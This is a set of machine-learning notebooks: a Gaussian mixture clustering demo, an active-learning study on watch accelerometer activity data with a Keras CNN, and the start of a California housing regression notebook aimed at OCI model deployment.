def generate_random(sigma, N, mu1=[15., 25., 10], mu2=[30., 40., 30], mu3=[25., 10., 20], mu4=[40., 30., 40]):
c = sigma.shape[-1]
X = np.zeros((N, c))
target = np.zeros((N,1))
for i in range(N):
if np.random.random(1) < 0.25:
X[i, :] = np.random.multivariate_normal(mu1, sigma[0, :, :], 1) # первая гауссовская модель
target[i] = 0
elif 0.25 <= np.random.random(1) < 0.5:
X[i, :] = np.random.multivariate_normal(mu2, sigma[1, :, :], 1) # вторая гауссовская модель
target[i] = 1
elif 0.5 <= np.random.random(1) < 0.75:
X[i, :] = np.random.multivariate_normal(mu3, sigma[2, :, :], 1) # третья гауссовская модель
target[i] = 2
else:
X[i, :] = np.random.multivariate_normal(mu4, sigma[3, :, :], 1) # четвертая гауссовская модель
target[i] = 3
return X, target
#@markdown - **Stochastic data**
k, N = 4, 400
sigma = np.zeros((k, 3, 3))
for i in range(k):
sigma[i, :, :] = np.diag(np.random.randint(10, 25, size=(3, )))
sample, target = generate_random(sigma, N)
feature_names = ['x_label', 'y_label', 'z_label']
target_names = ['gaussian1', 'gaussian2', 'gaussian3', 'gaussian4']
data = Bunch(sample=sample, feature_names=feature_names, target=target, target_names=target_names)
#@markdown - **Iterative training until the convergence condition is met**
# Initialize model parameters
model = GaussianMM()
err_mu = 1e-4 #@param {type: "number"}
err_alpha = 1e-4 #@param {type: "number"}
# -------------Two categories----------------
model.init_fn(f_dim=3, num_mixed=2)
# print('mu:\n', model.mu)
# print('sigma:\n', model.sigma)
# print('alpha:\n', model.alpha)
# Train the model
model.fit(data.sample, err_mu=err_mu, err_alpha=err_alpha, max_iter=100)
# Prediction
tar2 = model.predict(data.sample)
# -------------Three categories----------------
model.init_fn(f_dim=3, num_mixed=3)
model.fit(data.sample, err_mu=err_mu, err_alpha=err_alpha, max_iter=100)
tar3 = model.predict(data.sample)
# -------------Four categories----------------
model.init_fn(f_dim=3, num_mixed=4)
model.fit(data.sample, err_mu=err_mu, err_alpha=err_alpha, max_iter=100)
tar4 = model.predict(data.sample)
#@markdown - **Plot of the training-data distribution and the clustering results**
#@markdown - **Training data and two categories**
titles = ['Random training data', 'Clustered data by 2-GMM']
DATA = [data.sample, data.sample]
color=['b','r','g','y']
fig = plt.figure(1, figsize=(16, 8))
fig.subplots_adjust(wspace=.01, hspace=.02)
for i, title, data_n in zip([1, 2], titles, DATA):
ax = fig.add_subplot(1, 2, i, projection='3d')
if title == 'Random training data':
ax.scatter(data_n[:,0], data_n[:,1], data_n[:,2], c='b', s=35, alpha=0.4, marker='o')
else:
for j in range(N):
ax.scatter(data_n[j, 0], data_n[j, 1], data_n[j, 2], c=color[tar2[j]], s=35, alpha=0.4, marker='P')
ax.set_xlabel('X')
ax.set_ylabel('Y')
ax.set_zlabel('Z')
ax.view_init(elev=20., azim=-25)
ax.set_title(title, fontsize=14)
#@markdown - **Three categories and four categories**
titles = ['Clustered data by 3-GMM', 'Clustered data by 4-GMM']
TAR = [tar3, tar4]
fig = plt.figure(2, figsize=(16, 8))
fig.subplots_adjust(wspace=.01, hspace=.02)
for i, title, data_n, tar in zip([1, 2], titles, DATA, TAR):
ax = fig.add_subplot(1, 2, i, projection='3d')
for j in range(N):
ax.scatter(data_n[j, 0], data_n[j, 1], data_n[j, 2], c=color[tar[j]], s=35, alpha=0.4, marker='P')
ax.set_xlabel('X')
ax.set_ylabel('Y')
ax.set_zlabel('Z')
ax.view_init(elev=20., azim=-25)
ax.set_title(title, fontsize=14)
plt.show()
###Output
_____no_output_____ |
HHAR_watch.ipynb | ###Markdown
Import Statements
###Code
import numpy as np
import scipy
import random
from six.moves import range
# random.seed(5001)
from sklearn.metrics import f1_score, recall_score, confusion_matrix, classification_report
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
import matplotlib.pyplot as plt
from matplotlib.pyplot import imshow
import pandas as pd
from scipy.signal import decimate
from scipy.stats import mode
import pywt
import seaborn as sn
from collections import Counter
from keras.utils import to_categorical
import warnings
warnings.filterwarnings('ignore')
###Output
_____no_output_____
###Markdown
Data Extraction
###Code
pa = pd.read_csv("Watch_accelerometer.csv")
# pa=pd.read_csv("Phones_gyroscope.csv")
# wa=pd.read_csv("Watch_accelerometer.csv")
# wg=pd.read_csv("Watch_gyroscope.csv")
print (pa.shape)
print("Done")
pa = pa[pa['gt'] != 'null']
print (pa.shape)
pa = pa.dropna()
print (pa.shape)
acts = pa['gt'].unique()
users = pa['User'].unique()
devices = pa['Device'].unique()
print (devices)
print (acts)
print (users)
l = {}
for i, act in enumerate(acts):
l[act] = i
print (l)
dev = {}
for i, d in enumerate(devices):
dev[d] = i
print (dev)
use = {}
for i, u in enumerate(users):
use[u] = i
print (use)
###Output
_____no_output_____
###Markdown
Train users: a, b, c, d, e, f, g, h. Test user: i
###Code
userTrain, userTest = [], []
for i in range(len(users)):
train = []
if i != 8:
train.extend(users[i+1:])
if i != 0:
train.extend(users[:i])
#print (users[i])
userTrain.append(train)
userTest.append(users[i])
print (userTrain, userTest)
def getData(userList):
devs, acc, labels = [], [], []
for user in userList:
pa_user = pa[pa['User'] == user]
for act in acts:
pa_act = pa_user[pa_user['gt'] == act]
for device in devices:
pa_dev = pa_act[pa_act['Device'] == device]
pa_dev = pa_dev[['x', 'y','z']]
if str(device) == 'lgwatch_1' or str(device) == 'lgwatch_2':
min_win = 400
# elif str(device) == 'gear_1' or str(device) == 'gear_2':
else:
min_win = 200
if(pa_dev.shape[0] >= min_win):
acc.append(pa_dev.values)
devs.append(device)
labels.append(l[act])
print (len(labels))
print (f'{user} done')
acc = np.array(acc)
labels = np.array(labels)
devs = np.array(devs)
print ("Done")
print(acc.shape, labels.shape, devs.shape)
return acc, labels, devs
Xtrain1, Ytrain1, devs1 = getData(userTrain[-1])
Xtest1, Ytest1, devs2 = getData(userTest[-1])
###Output
_____no_output_____
###Markdown
Getting the Windowed Data
###Code
def getWindowedData(acc, labels, index, w_min):
windowData, windowLabels = [], []
num_windows = acc[index].shape[0] // w_min
if num_windows == 0:
print(acc[index].shape[0], w_min)
k = 0
for _ in range(num_windows):
windowData.append(acc[index][k:k+w_min])
k += w_min
windowLabels.append(labels[index])
return windowData, windowLabels
# Getting 2 seconds (200 samples) of data for all devices
main_train = []
for i in range(len(Xtrain1)):
if str(devs1[i]) == 'lgwatch_1' or str(devs1[i]) == 'lgwatch_2':
w_min = 400
else:
w_min = 200
main_train.append((getWindowedData(Xtrain1, Ytrain1, i, w_min)))
main_test = []
for i in range(len(Xtest1)):
if str(devs2[i]) == 'lgwatch_1' or str(devs2[i]) == 'lgwatch_2':
w_min = 400
else:
w_min = 200
main_test.append((getWindowedData(Xtest1, Ytest1, i, w_min)))
print (main_train[-1][0][0].shape)
print (main_train[-1][1][0])
###Output
_____no_output_____
###Markdown
Decimating the Windowed Data
###Code
def decimateThatSignal(main, i):
final_decimated_signals = []
label = []
if main[i][0][0].shape[0] == 400:
for j in range(len(main[i][0])):
decimated_signal_0 = decimate(main[i][0][j][:,0], 2)
decimated_signal_1 = decimate(main[i][0][j][:,1], 2)
decimated_signal_2 = decimate(main[i][0][j][:,2], 2)
decimated_signal = np.dstack((decimated_signal_0, decimated_signal_1, decimated_signal_2))
final_decimated_signals.append(decimated_signal)
label.append(main[i][1][j])
return np.array(final_decimated_signals), np.array(label)
else:
return np.array(main[i][0]), np.array(main[i][1])
w_min = 200
Xtrain1 = decimateThatSignal(main_train, 0)[0].reshape((-1, w_min, 3))
Ytrain1 = decimateThatSignal(main_train, 0)[1]
for i in range(1, len(main_train)):
print (i)
Xtrain1, Ytrain1 = np.vstack((Xtrain1, decimateThatSignal(main_train, i)[0].reshape((-1, w_min, 3)))), np.hstack((Ytrain1, decimateThatSignal(main_train, i)[1]))
#mainDecimated.append(DecimateThatSignal(i).reshape((-1, 100, 3)))
Xtrain1 = np.array(Xtrain1)
Ytrain1 = np.array(Ytrain1)
w_min = 200
Xtest1 = decimateThatSignal(main_test, 0)[0].reshape((-1, w_min, 3))
Ytest1 = decimateThatSignal(main_test, 0)[1]
for i in range(1, len(main_test)):
print (i)
Xtest1, Ytest1 = np.vstack((Xtest1, decimateThatSignal(main_test, i)[0].reshape((-1, w_min, 3)))), np.hstack((Ytest1, decimateThatSignal(main_test, i)[1]))
#mainDecimated.append(DecimateThatSignal(i).reshape((-1, 100, 3)))
Xtest1 = np.array(Xtest1)
Ytest1 = np.array(Ytest1)
print (Xtrain1.shape, Ytrain1.shape)
print (Xtest1.shape, Ytest1.shape)
###Output
_____no_output_____
###Markdown
Getting the DWTed Data
###Code
pywt.wavelist()
# Change window size here as and when DWT wavelet changes
w_min = 100+3
def performDWT(x, Y):
masterX = []
for i in range(len(x)):
Xca, Xda = pywt.dwt(x[i].reshape((-1, 3))[:,0], 'db4', mode='periodic')
Yca, Yda = pywt.dwt(x[i].reshape((-1, 3))[:,1], 'db4', mode='periodic')
Zca, Zda = pywt.dwt(x[i].reshape((-1, 3))[:,2], 'db4', mode='periodic')
coef = np.hstack((Xca, Yca, Zca)).reshape((-1, w_min, 3))
masterX.append((coef, Y[i]))
print (i)
masterX = np.array(masterX)
return masterX
masterTrain = performDWT(Xtrain1, Ytrain1)
masterTest = performDWT(Xtest1, Ytest1)
print (masterTrain.shape, masterTest.shape)
###Output
_____no_output_____
###Markdown
Train-Test Split
###Code
#for training
Y_train = []
X_train = np.zeros((masterTrain.shape[0], 1, w_min, 3))
for i in range(masterTrain.shape[0]):
X_train[i, :, :] = masterTrain[i][0][:]
Y_train.append(masterTrain[i][1])
y_train = np.array(Y_train)
#for test
Y_test = []
X_test = np.zeros((masterTest.shape[0], 1, w_min, 3))
for i in range(masterTest.shape[0]):
X_test[i, :, :] = masterTest[i][0][:]
Y_test.append(masterTest[i][1])
y_test = np.array(Y_test)
print (y_train.shape, y_test.shape)
X_train = X_train.reshape((-1, w_min, 3)).astype('float32')
X_test = X_test.reshape((-1, w_min, 3)).astype('float32')
print(X_train.shape, X_test.shape, y_train.shape, y_test.shape)
###Output
_____no_output_____
###Markdown
Params Initialize
###Code
num_classes = 6
img_rows, img_cols = 103, 3
learning_rate = 2e-4
# subset_size = 2000
###Output
_____no_output_____
###Markdown
Train-Valid-Pool Split
###Code
np.bincount(y_test)
X_test, X_pool, y_test, y_pool = train_test_split(X_test, y_test, test_size=0.7, stratify=y_test)
print ('Pool:', X_pool.shape, y_pool.shape)
print ('Test:', X_test.shape, y_test.shape)
###Output
_____no_output_____
###Markdown
Zero-Mean Normalization
###Code
# X_train_All, X_test, y_train_All, y_test = train_test_split(data, labels, stratify=labels, test_size=0.2, random_state=5233)
#X_train, X_test, y_train_All, y_test = train_test_split(data, labels, stratify=labels, test_size=0.2, random_state=5233)
X_train_fit0 = StandardScaler().fit(X_train[:, :, 0])
X_train0 = X_train_fit0.transform(X_train[:, :, 0])
X_train_fit1 = StandardScaler().fit(X_train[:, :, 1])
X_train1 = X_train_fit1.transform(X_train[:, :, 1])
X_train_fit2 = StandardScaler().fit(X_train[:, :, 2])
X_train2 = X_train_fit2.transform(X_train[:, :, 2])
X_pool0 = X_train_fit0.transform(X_pool[:, :, 0])
X_pool1 = X_train_fit1.transform(X_pool[:, :, 1])
X_pool2 = X_train_fit2.transform(X_pool[:, :, 2])
X_test0 = X_train_fit0.transform(X_test[:, :, 0])
X_test1 = X_train_fit1.transform(X_test[:, :, 1])
X_test2 = X_train_fit2.transform(X_test[:, :, 2])
# print (X_train0.shape, X_test0.shape)
X_train = np.dstack((X_train0, X_train1, X_train2))
X_pool = np.dstack((X_pool0, X_pool1, X_pool2))
X_test = np.dstack((X_test0, X_test1, X_test2))
del X_train0, X_train1, X_train2, X_pool0, X_pool1, X_pool2, X_test0, X_test1, X_test2
print (X_train.shape, X_pool.shape, X_test.shape)
print (y_train.shape, y_pool.shape, y_test.shape)
print ('Distribution of Training Classes:', np.bincount(y_train))
Y_train = to_categorical(y_train, num_classes)
Y_test = to_categorical(y_test, num_classes)
Y_pool = to_categorical(y_pool, num_classes)
print ('Distribution of Train Classes:', np.bincount(y_train))
print ('Distribution of Pool Classes:', np.bincount(y_pool))
print ('Distribution of Test Classes:', np.bincount(y_test))
print ('Train:', X_train.shape, Y_train.shape)
print ('Pool:', X_pool.shape, Y_pool.shape)
print ('Test:', X_test.shape, Y_test.shape)
###Output
_____no_output_____
###Markdown
Keras Imports
###Code
import keras
from keras.models import Sequential, Model, load_model
from keras.layers import Dense, Dropout, Input, Flatten, Reshape, concatenate, Lambda
from keras.layers import Conv1D, Conv2D, MaxPooling1D, MaxPooling2D, BatchNormalization
from keras.utils import to_categorical
from keras import backend as K
from keras.optimizers import Adam
from keras.callbacks import ModelCheckpoint, EarlyStopping
X_train0 = X_train[:, :, 0].reshape((-1, w_min, 1))
X_train1 = X_train[:, :, 1].reshape((-1, w_min, 1))
X_train2 = X_train[:, :, 2].reshape((-1, w_min, 1))
X_pool0 = X_pool[:, :, 0].reshape((-1, w_min, 1))
X_pool1 = X_pool[:, :, 1].reshape((-1, w_min, 1))
X_pool2 = X_pool[:, :, 2].reshape((-1, w_min, 1))
X_test0 = X_test[:, :, 0].reshape((-1, w_min, 1))
X_test1 = X_test[:, :, 1].reshape((-1, w_min, 1))
X_test2 = X_test[:, :, 2].reshape((-1, w_min, 1))
print (X_train0.shape, X_pool0.shape, X_test0.shape)
def harnet():
# Model X
inputX = Input(shape=(X_train0.shape[1], X_train0.shape[2]))
convX1 = Conv1D(filters=8, kernel_size=2, padding='same', activation='relu')(inputX)
batchX1 = BatchNormalization()(convX1)
poolX1 = MaxPooling1D(pool_size=2, padding='same')(batchX1)
convX2 = Conv1D(filters=16, kernel_size=2, padding='same', activation='relu')(poolX1)
batchX2 = BatchNormalization()(convX2)
poolX2 = MaxPooling1D(pool_size=2, padding='same')(batchX2)
modelX = Flatten()(poolX2)
# Model Y
inputY = Input(shape=(X_train1.shape[1], X_train2.shape[2]))
convY1 = Conv1D(filters=8, kernel_size=2, padding='same', activation='relu')(inputY)
batchY1 = BatchNormalization()(convY1)
poolY1 = MaxPooling1D(pool_size=2, padding='same')(batchY1)
convY2 = Conv1D(filters=16, kernel_size=2, padding='same', activation='relu')(poolY1)
batchY2 = BatchNormalization()(convY2)
poolY2 = MaxPooling1D(pool_size=2, padding='same')(batchY2)
modelY = Flatten()(poolY2)
# Model Z
inputZ = Input(shape=(X_train2.shape[1], X_train2.shape[2]))
convZ1 = Conv1D(filters=8, kernel_size=2, padding='same', activation='relu')(inputZ)
batchZ1 = BatchNormalization()(convZ1)
poolZ1 = MaxPooling1D(pool_size=2, padding='same')(batchZ1)
convZ2 = Conv1D(filters=16, kernel_size=2, padding='same', activation='relu')(poolZ1)
batchZ2 = BatchNormalization()(convZ2)
poolZ2 = MaxPooling1D(pool_size=2, padding='same')(batchZ2)
# Merge Models X, Y, Z
modelZ = Flatten()(poolZ2)
merged_model = concatenate([modelX, modelY, modelZ])
print (K.int_shape(merged_model))
final_merge = Reshape((K.int_shape(merged_model)[1]//3, 3, 1))(merged_model)
print (K.int_shape(final_merge))
# Conv2D
conv1 = Conv2D(filters=8, kernel_size=(3, 3), padding='same')(final_merge)
batch1 = BatchNormalization()(conv1)
pool1 = MaxPooling2D(pool_size=(2, 2), padding='same')(batch1)
conv2 = Conv2D(filters=16, kernel_size=(3, 3), padding='same')(pool1)
batch2 = BatchNormalization()(conv2)
pool2 = MaxPooling2D(pool_size=(2, 2), padding='same')(batch2)
#drop2d = Lambda(lambda x: K.dropout(x, level=0.25))(pool2)
flatten = Flatten()(pool2)
# Dense
fc1 = Dense(16, activation='relu', kernel_initializer='glorot_normal')(flatten)
# fc1 = Dropout(0.25)(fc1)
# Stochastic Dropout Layer
fc1 = Lambda(lambda x: K.dropout(x, level=0.25))(fc1)
fc2 = Dense(8, activation='relu')(flatten)
# Output Layer - Softmax
output = Dense(num_classes, activation='softmax')(fc2)
# Final Model
model = Model([inputX, inputY, inputZ], output)
model.compile(loss='categorical_crossentropy', optimizer=Adam(learning_rate), metrics=['accuracy']) #beta_1=0.9, beta_2=0.999))
return model
model = harnet()
model.summary()
# save_path = './Save_Files/Watch_User_i.h5'
# checkpoint = ModelCheckpoint(save_path, monitor='val_acc', save_best_only=True, mode='max')
# callback = [checkpoint]
# hist = model.fit([X_train0, X_train1, X_train2], Y_train, epochs=50, batch_size=64, \
# validation_data=([X_test0, X_test1, X_test2], Y_test))#, callbacks=callback)
model = load_model('./Save_Files/Watch_User_i.h5')
# np.save('./Save_Files/hist_Watch_User_i', hist.history)
histC = np.load('./Save_Files/hist_Watch_User_i.npy').tolist()
print (len(histC['val_loss']))
# print (max(hist.history['val_acc']))
print (max(histC['val_acc']))
model.evaluate([X_test0, X_test1, X_test2], Y_test)
y_prob = model.predict([X_test0, X_test1, X_test2])
y_pred = y_prob.argmax(axis=-1)
y_true = np.array([np.argmax(y) for y in Y_test])
print (y_true.shape, y_pred.shape)
###Output
_____no_output_____
###Markdown
Preprocess for Active Learning
###Code
subset_size = X_pool.shape[0]
subset_indices = np.asarray(random.sample(range(0, X_pool.shape[0]), subset_size))
X_pool_subset = X_pool[subset_indices]
Y_pool_subset = Y_pool[subset_indices]
# X_pool_new = np.delete(X_pool, subset_indices, axis=0)
# Y_pool_new = np.delete(Y_pool, subset_indices, axis=0)
print (X_pool_subset.shape, Y_pool_subset.shape)
# print (X_pool_new.shape, Y_pool_new.shape)
X_pool_subset0 = X_pool_subset[:, :, 0].reshape((-1, w_min, 1))
X_pool_subset1 = X_pool_subset[:, :, 1].reshape((-1, w_min, 1))
X_pool_subset2 = X_pool_subset[:, :, 2].reshape((-1, w_min, 1))
print (X_pool_subset0.shape, X_pool_subset1.shape, X_pool_subset2.shape)
pool_min = 0
pool_max = int(0.6*X_pool_subset.shape[0])
pool_iter = pool_max//8
print (pool_min, pool_max, pool_iter)
pool_percents = np.arange(12.5, 101, 12.5)
print (pool_percents)
from acquisition_functions import bald, varratio, maxentropy, random_acq
###Output
_____no_output_____
###Markdown
BALD
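For context, BALD (Bayesian Active Learning by Disagreement) scores each pool point by the mutual information between its predicted label and the model parameters, usually approximated with $T$ stochastic forward passes (MC dropout):

$$a_{\text{BALD}}(x) = \mathbb{H}\Big[\tfrac{1}{T}\textstyle\sum_{t=1}^{T} p(y \mid x, \hat\omega_t)\Big] - \tfrac{1}{T}\textstyle\sum_{t=1}^{T}\mathbb{H}\big[p(y \mid x, \hat\omega_t)\big]$$

The estimator actually used below lives in the external `acquisition_functions` module, which is not shown in this notebook, so treat the formula as the standard definition rather than a guaranteed description of that implementation.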
###Code
acc_inc_bald, f1_inc_bald, recall_inc_bald = [], [], []
# Acquisition queries 8 times
for n_queries in range(pool_min, pool_max, pool_iter)[1:]:
print ('Queries:', n_queries)
model = load_model('./Save_Files/Watch_User_i.h5')
bald_uncertainty_estimates = bald([X_pool_subset0, X_pool_subset1, X_pool_subset2], \
num_classes, model, 16, 10)
bald_uncertainty_estimates = bald_uncertainty_estimates.flatten()
acquired_indices = bald_uncertainty_estimates.argsort()[-n_queries:][::-1]
X_acquired_bald = X_pool[acquired_indices]
Y_acquired_bald = Y_pool[acquired_indices]
print ('BALD Acquired Shape:', X_acquired_bald.shape, Y_acquired_bald.shape)
y_acquired_bald = Y_acquired_bald.argmax(axis=-1)
np.bincount(y_acquired_bald)
# Incremental Learning
X_acquired0 = X_acquired_bald[:, :, 0].reshape((-1, w_min, 1))
X_acquired1 = X_acquired_bald[:, :, 1].reshape((-1, w_min, 1))
X_acquired2 = X_acquired_bald[:, :, 2].reshape((-1, w_min, 1))
print (X_acquired0.shape, X_acquired1.shape, X_acquired2.shape)
hist = model.fit([X_acquired0, X_acquired1, X_acquired2], Y_acquired_bald, epochs=30, batch_size=4, \
validation_data=([X_test0, X_test1, X_test2], Y_test))
inc_acc = max(hist.history['val_acc'])
model.evaluate([X_test0, X_test1, X_test2], Y_test, batch_size=8)
print ('Incremental Learning:', inc_acc)
acc_inc_bald.append(inc_acc)
y_prob = model.predict([X_test0, X_test1, X_test2], batch_size=8)
y_pred = y_prob.argmax(axis=-1)
f1_inc_bald.append(f1_score(y_test, y_pred, average='weighted'))
recall_inc_bald.append(recall_score(y_test, y_pred, average='weighted'))
print ()
###Output
_____no_output_____
###Markdown
Var Ratio
###Code
acc_inc_var, f1_inc_var, recall_inc_var = [], [], []
# Acquisition queries 8 times
for n_queries in range(pool_min, pool_max, pool_iter)[1:]:
print ('Queries:', n_queries)
model = load_model('./Save_Files/Watch_User_i.h5')
var_uncertainty_estimates = varratio([X_pool_subset0, X_pool_subset1, X_pool_subset2], \
num_classes, model, 16, 10)
var_uncertainty_estimates = var_uncertainty_estimates.flatten()
acquired_indices = var_uncertainty_estimates.argsort()[-n_queries:][::-1]
X_acquired_var = X_pool[acquired_indices]
Y_acquired_var = Y_pool[acquired_indices]
print ('Var Ratio Acquired Shape:', X_acquired_var.shape, Y_acquired_var.shape)
y_acquired_var = Y_acquired_var.argmax(axis=-1)
np.bincount(y_acquired_var)
# Incremental Learning
X_acquired0 = X_acquired_var[:, :, 0].reshape((-1, w_min, 1))
X_acquired1 = X_acquired_var[:, :, 1].reshape((-1, w_min, 1))
X_acquired2 = X_acquired_var[:, :, 2].reshape((-1, w_min, 1))
print (X_acquired0.shape, X_acquired1.shape, X_acquired2.shape)
hist = model.fit([X_acquired0, X_acquired1, X_acquired2], Y_acquired_var, epochs=30, batch_size=4, \
validation_data=([X_test0, X_test1, X_test2], Y_test))
inc_acc = max(hist.history['val_acc'])
model.evaluate([X_test0, X_test1, X_test2], Y_test, batch_size=8)
print ('Incremental Learning:', inc_acc)
acc_inc_var.append(inc_acc)
y_prob = model.predict([X_test0, X_test1, X_test2], batch_size=8)
y_pred = y_prob.argmax(axis=-1)
f1_inc_var.append(f1_score(y_test, y_pred, average='weighted'))
recall_inc_var.append(recall_score(y_test, y_pred, average='weighted'))
print ()
###Output
_____no_output_____
###Markdown
Max Entropy
###Code
acc_inc_maxent, f1_inc_maxent, recall_inc_maxent = [], [], []
# Acquisition queries 8 times
for n_queries in range(pool_min, pool_max, pool_iter)[1:]:
print ('Queries:', n_queries)
model = load_model('./Save_Files/Watch_User_i.h5')
maxent_uncertainty_estimates = maxentropy([X_pool_subset0, X_pool_subset1, X_pool_subset2], \
num_classes, model, 16, 10)
maxent_uncertainty_estimates = maxent_uncertainty_estimates.flatten()
acquired_indices = maxent_uncertainty_estimates.argsort()[-n_queries:][::-1]
X_acquired_maxent = X_pool[acquired_indices]
Y_acquired_maxent = Y_pool[acquired_indices]
print ('Max Entropy Acquired Shape:', X_acquired_maxent.shape, Y_acquired_maxent.shape)
y_acquired_maxent = Y_acquired_maxent.argmax(axis=-1)
np.bincount(y_acquired_maxent)
# Incremental Learning
X_acquired0 = X_acquired_maxent[:, :, 0].reshape((-1, w_min, 1))
X_acquired1 = X_acquired_maxent[:, :, 1].reshape((-1, w_min, 1))
X_acquired2 = X_acquired_maxent[:, :, 2].reshape((-1, w_min, 1))
print (X_acquired0.shape, X_acquired1.shape, X_acquired2.shape)
hist = model.fit([X_acquired0, X_acquired1, X_acquired2], Y_acquired_maxent, epochs=30, batch_size=4, \
validation_data=([X_test0, X_test1, X_test2], Y_test))
inc_acc = max(hist.history['val_acc'])
model.evaluate([X_test0, X_test1, X_test2], Y_test, batch_size=8)
print ('Incremental Learning:', inc_acc)
acc_inc_maxent.append(inc_acc)
y_prob = model.predict([X_test0, X_test1, X_test2], batch_size=8)
y_pred = y_prob.argmax(axis=-1)
f1_inc_maxent.append(f1_score(y_test, y_pred, average='weighted'))
recall_inc_maxent.append(recall_score(y_test, y_pred, average='weighted'))
print ()
###Output
_____no_output_____
###Markdown
Random Acquisitions
###Code
acc_inc_rand, f1_inc_rand, recall_inc_rand = [], [], []
# Acquisition queries 8 times
for n_queries in range(pool_min, pool_max, pool_iter)[1:]:
print ('Queries:', n_queries)
model = load_model('./Save_Files/Watch_User_i.h5')
rand_uncertainty_estimates = random_acq([X_pool_subset0, X_pool_subset1, X_pool_subset2], \
num_classes, model, 16, 10)
rand_uncertainty_estimates = rand_uncertainty_estimates.flatten()
acquired_indices = rand_uncertainty_estimates.argsort()[-n_queries:][::-1]
X_acquired_rand = X_pool[acquired_indices]
Y_acquired_rand = Y_pool[acquired_indices]
print ('Random Acquired Shape:', X_acquired_rand.shape, Y_acquired_rand.shape)
y_acquired_rand = Y_acquired_rand.argmax(axis=-1)
np.bincount(y_acquired_rand)
# Incremental Learning
X_acquired0 = X_acquired_rand[:, :, 0].reshape((-1, w_min, 1))
X_acquired1 = X_acquired_rand[:, :, 1].reshape((-1, w_min, 1))
X_acquired2 = X_acquired_rand[:, :, 2].reshape((-1, w_min, 1))
print (X_acquired0.shape, X_acquired1.shape, X_acquired2.shape)
hist = model.fit([X_acquired0, X_acquired1, X_acquired2], Y_acquired_rand, epochs=60, batch_size=16, \
validation_data=([X_test0, X_test1, X_test2], Y_test))
inc_acc = max(hist.history['val_acc'])
model.evaluate([X_test0, X_test1, X_test2], Y_test, batch_size=8)
print ('Incremental Learning:', inc_acc)
acc_inc_rand.append(inc_acc)
y_prob = model.predict([X_test0, X_test1, X_test2], batch_size=8)
y_pred = y_prob.argmax(axis=-1)
f1_inc_rand.append(f1_score(y_test, y_pred, average='weighted'))
recall_inc_rand.append(recall_score(y_test, y_pred, average='weighted'))
print ()
acc_inc_df = pd.DataFrame(index=np.arange(pool_min, pool_max, pool_iter)[1:])
acc_inc_df['BALD'] = np.array(acc_inc_bald) * 100
acc_inc_df['VarRatio'] = np.array(acc_inc_var) * 100
acc_inc_df['MaxEntropy'] = np.array(acc_inc_maxent) * 100
acc_inc_df['Random'] = np.array(acc_inc_rand) * 100
acc_inc_df
f1_inc_df = pd.DataFrame(index=np.arange(pool_min, pool_max, pool_iter)[1:])
f1_inc_df['BALD'] = np.array(f1_inc_bald) * 100
f1_inc_df['VarRatio_'] = np.array(f1_inc_var) * 100
f1_inc_df['MaxEntropy'] = np.array(f1_inc_maxent) * 100
f1_inc_df['Random'] = np.array(f1_inc_rand) * 100
f1_inc_df
recall_inc_df = pd.DataFrame(index=np.arange(pool_min, pool_max, pool_iter)[1:])
recall_inc_df['BALD'] = np.array(recall_inc_bald) * 100
recall_inc_df['VarRatio_'] = np.array(recall_inc_var) * 100
recall_inc_df['MaxEntropy'] = np.array(recall_inc_maxent) * 100
recall_inc_df['Random'] = np.array(recall_inc_rand) * 100
recall_inc_df
acc_inc_df.to_csv('./CSV_Results/User_i/acc_inc.csv', sep=',')
f1_inc_df.to_csv('./CSV_Results/User_i/f1_inc.csv', sep=',')
recall_inc_df.to_csv('./CSV_Results/User_i/recall_inc.csv', sep=',')
###Output
_____no_output_____ |
california_housing_model_deployment.ipynb | ###Markdown
Regression and One-click deployment example. In this Notebook I walk through all the steps needed to develop a **regression model** and save the model to the OCI Data Science **Model Catalog**. After the model has been saved, I deploy the model as a **REST** service. The Notebook is based on the **California Housing Dataset**, downloaded from sklearn.
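Once the saved model has been deployed as a Model Deployment, the endpoint is invoked over plain HTTP. The sketch below is only illustrative: the URI is a hypothetical placeholder, OCI request signing is omitted (a real call must be authenticated), and the JSON payload layout matches what the `score.py` `predict()` function shown later in this notebook expects (a list of feature rows):

```python
import json
import requests

# hypothetical placeholder; replace with the real model-deployment URI from the OCI console
uri = "https://modeldeployment.<region>.oci.customer-oci.com/<deployment-ocid>/predict"

# one feature row in the order used for training (AveBedrms, AveOccup, AveRooms, HouseAge, MedInc, Population)
payload = json.dumps([[1.05, 4.66, 5.08, 19, 2.24, 1665.0]])

# NOTE: authentication is intentionally left out of this sketch
response = requests.post(uri, data=payload, headers={"Content-Type": "application/json"})
print(response.json())
```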
###Code
import pandas as pd
import numpy as np
from pandas.api.types import is_numeric_dtype
# the dataset used for the example
from sklearn.datasets import fetch_california_housing
from sklearn.model_selection import train_test_split
# the GBM used
import xgboost as xgb
# to use ADSTuner
from ads.hpo.search_cv import ADSTuner
from ads.hpo.stopping_criterion import *
from ads.hpo.distributions import *
# to save to Model catalog
import pickle
import os
from ads import set_auth
from ads.common.model_artifact import ModelArtifact
from ads.common.model_export_util import prepare_generic_model
from ads.common.model_metadata import (MetadataCustomCategory,
UseCaseType)
###Output
_____no_output_____
###Markdown
some utility functions
###Code
# functions
def get_general_info(data_df):
print(f"There are: {len(data_df.columns)} columns in the dataset")
print()
print(
"The list of column names, in alphabetical order:",
sorted(list(data_df.columns)),
)
print()
print(f"There are {data_df.shape[0]} records in the dataset")
print()
return
# well you have to decide a threshold in terms of a fraction
# to decide if the col is categorical
FRAC = 0.1
def analyze_df(data_df):
# it is ok to use isna, isnull is an alias of isna
missing_val = data_df.isna().sum()
# cardinality
THR = data_df.shape[0] * FRAC
list_card = []
list_cat = []
list_dtypes = []
list_num_zeros = []
for col in data_df.columns:
# count the # of distinct values
n_distinct = data_df[col].nunique()
list_card.append(n_distinct)
        # whether the column is categorical is decided by this rule
if n_distinct < THR:
# categorical
list_cat.append("Yes")
else:
list_cat.append("No")
list_dtypes.append(data_df[col].dtype)
# build the results DF
result_df = pd.DataFrame(
{
"col_name": list(data_df.columns),
"missing_vals": missing_val,
"cardinality": list_card,
"is_categorical": list_cat,
"data_type": list_dtypes,
},
index=None,
)
# if you don't want cols as index
result_df.reset_index(drop=True, inplace=True)
return result_df
def show_tuner_results(tuner):
# to count completed
result_df = tuner.trials[tuner.trials["state"] == "COMPLETE"].sort_values(
by=["value"], ascending=False
)
print("ADSTuner session results:")
print(f"ADSTuner has completed {result_df.shape[0]} trials")
print()
print(f"The best trial is the #: {tuner.best_index}")
print(f"Parameters for the best trial are: {tuner.best_params}")
print(f"The metric used to optimize is: {tuner.scoring_name}")
